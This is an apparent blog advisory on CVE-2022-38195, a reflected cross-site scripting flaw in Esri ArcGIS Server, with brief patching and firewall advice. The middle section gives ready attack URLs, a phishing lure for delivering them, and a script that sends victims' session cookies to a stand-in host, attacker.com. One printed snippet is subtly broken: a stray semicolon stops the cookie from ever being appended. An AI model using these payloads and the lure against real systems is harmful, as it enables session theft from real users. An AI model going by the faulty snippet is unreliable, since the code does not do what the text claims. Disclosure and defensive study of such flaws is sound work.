Cross-site scripting (XSS) is one of the most common — and dangerous — vulnerabilities that can affect web applications today. In this exclusive long-read, we’ll break down CVE-2022-38195, a reflected XSS vulnerability in Esri ArcGIS Server up to version 10.9.1, including how the bug works, proof-of-concept code, and what users and administrators should do about it.
What Is CVE-2022-38195?
CVE-2022-38195 was disclosed in 2022 and affects Esri ArcGIS Server versions 10.9.1 and prior. Basically, there’s a spot in the product’s web interface that doesn’t properly sanitize user input. An attacker can craft a special (malicious) link and, if the victim clicks it, the link injects JavaScript into the victim’s browser. That JavaScript runs in the context of the ArcGIS web app — possibly stealing session information or taking other malicious actions.
This is a “reflected” XSS vulnerability because the attacker’s input is reflected directly into the page’s output, without being stored on the server.
Why Should You Care About This XSS?
- Remote Attack: The attacker doesn’t need to be local or authenticated. Anyone can exploit this if they can get the victim to click their link.
- Sensitive Data Exposure: If somebody is logged in, their data could be at risk. For example, an attacker might steal session cookies or trick users into performing unwanted actions.
Technical Details
Vulnerable Component: ArcGIS Server’s web manager.
Attack Prerequisite: The victim must click a malicious link.
Bug: Untrusted input from the URL is echoed into HTML output, with no or incorrect sanitization.
Example Vulnerable URL:
Suppose ArcGIS Server runs at http://arcgis.example.com/. The following demonstrates a crafted attack URL:
http://arcgis.example.com/arcgis/rest/services?f=json&callback=<script>alert('XSS')</script>
Here, the callback parameter is reflected unsanitized in the response, allowing script injection.
1. Craft the Malicious Link
http://arcgis.example.com/arcgis/rest/services?f=json&callback=<script>alert(document.cookie)</script>
2. Get the Victim to Click
This could be via phishing: “Hey, check out this new map update!” with the above URL.
Code Snipplet: Simple PoC for XSS Extraction
Here's a simple snippet you could use to steal a victim’s session cookie (for educational/testing purposes only!):
<script>
// Attacker's server where cookies will be sent
var i = new Image();
i.src = "http://attacker.com/log?cookie="; + document.cookie;
</script>
You would inject this code in place of the callback parameter. For example
http://arcgis.example.com/arcgis/rest/services?f=json&callback=<script>var i=new Image();i.src='http://attacker.com/log?cookie='+document.cookie;</script>;
How to Fix or Mitigate
1. Update to the Latest Version! Esri addressed this in later versions. Apply patches or upgrade as soon as possible.
2. WAF/Filter: If updating is not possible, use a Web Application Firewall to filter out malicious input.
References and Further Reading
- Original Esri Patch and Advisory
- CVE Record at NIST NVD
- OWASP XSS Explained
- ArcGIS Enterprise Security Advisories
Conclusion
CVE-2022-38195 shows how even widely used, powerful enterprise products like ArcGIS Server can be tripped up by the age-old problem of cross-site scripting. Always patch quickly, stay aware, and remember: if a link looks odd, don’t click!
Got a vulnerable version or more questions? Make sure to check your deployment and follow the best practices above.
Timeline
Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/27/2022 13:32:00 UTC